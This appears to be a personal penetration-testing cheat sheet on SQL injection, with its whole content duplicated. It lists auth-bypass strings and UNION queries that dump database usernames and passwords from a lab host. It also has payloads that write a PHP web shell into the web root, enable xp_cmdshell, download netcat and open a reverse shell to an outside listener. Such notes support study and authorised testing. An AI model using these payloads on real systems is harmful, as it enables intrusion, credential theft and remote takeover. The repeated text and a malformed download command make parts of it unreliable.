sqli

PreviousFile Inclusion Vuln Nextmisc

Last updated 2 years ago

sqli

Detection

add ‘ in parameter

Auth Bypass

`````admin**' or 1=1 LIMIT 1;#**`

' or 1=1-- -

' or '1'='1

‘ or 1=1 --

Column Enum

http://10.11.0.22/debug.php?id=1 order by 1-- ****this will give error when number of coulmn exceed. so change the number to get correct columns

Union to get all data

Suppose columns are 3, below will check which column is display output

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, 3--**

Extract data through union

Suppose 2 and 3 is displayed. Now this will tell user and version of sql

http://10.11.0.22/debug.php?id=1 **union all select 1, user(), @@version**

Get database name

http://10.11.0.22/debug.php?id=1 **union all select 1, schema_name, 3 from information_schema.schemata**

Tell table name

http://10.11.0.22/debug.php?id=1 **union all select 1, table_name, 3 from information_schema.tables** this will give only 1 table to get all use union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’mysql’

tell column name from users table

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, column_name from information_schema.columns where table_name='users'**

Suppose there are 2 column username and password

http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from users**

http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from mysql.users**

Code execution

Depending on OS, below will local file output

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')**

INTO OUTFILE is used to create malicious file web root

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'**

It might give error but file is created. Visit /backdoor.php?cmd=dir to check

Reverse shell

Database enumeration is not usefull in some cases so do reverse shell
Enable xp_cmdshell
- ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
upload nc.exe from linux to victim
- ' EXEC xp_cmdshell 'powershell -c "certutil -urlcache -f C:\Windows\Tasks\nc.exe"'--
reverse shell
- nc -nvlp 4444
- ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --

Reference

Blind SQLI

For oracle injectionl

CHeatsheet

sqli

Detection

add ‘ in parameter

Auth Bypass

`````admin**' or 1=1 LIMIT 1;#**`

' or 1=1-- -

' or '1'='1

‘ or 1=1 --

Column Enum

http://10.11.0.22/debug.php?id=1 order by 1-- ****this will give error when number of coulmn exceed. so change the number to get correct columns

Union to get all data

Suppose columns are 3, below will check which column is display output

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, 3--**

Extract data through union

Suppose 2 and 3 is displayed. Now this will tell user and version of sql

http://10.11.0.22/debug.php?id=1 **union all select 1, user(), @@version**

Get database name

http://10.11.0.22/debug.php?id=1 **union all select 1, schema_name, 3 from information_schema.schemata**

Tell table name

tell column name from users table

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, column_name from information_schema.columns where table_name='users'**

Suppose there are 2 column username and password

http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from users**

http://10.11.0.22/debug.php?id=1 **union all select 1, username, password from mysql.users**

Code execution

Depending on OS, below will local file output

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')**

INTO OUTFILE is used to create malicious file web root

http://10.11.0.22/debug.php?id=1 **union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'**

It might give error but file is created. Visit /backdoor.php?cmd=dir to check

Reverse shell

Database enumeration is not usefull in some cases so do reverse shell
Enable xp_cmdshell
- ' EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
upload nc.exe from linux to victim
- ' EXEC xp_cmdshell 'powershell -c "certutil -urlcache -f C:\Windows\Tasks\nc.exe"'--
reverse shell
- nc -nvlp 4444
- ' EXEC xp_cmdshell 'powershell -c "C:\Windows\Tasks\nc.exe 192.168.119.143 4444 -e cmd.exe"' --

Reference

Blind SQLI

For oracle injectionl

CHeatsheet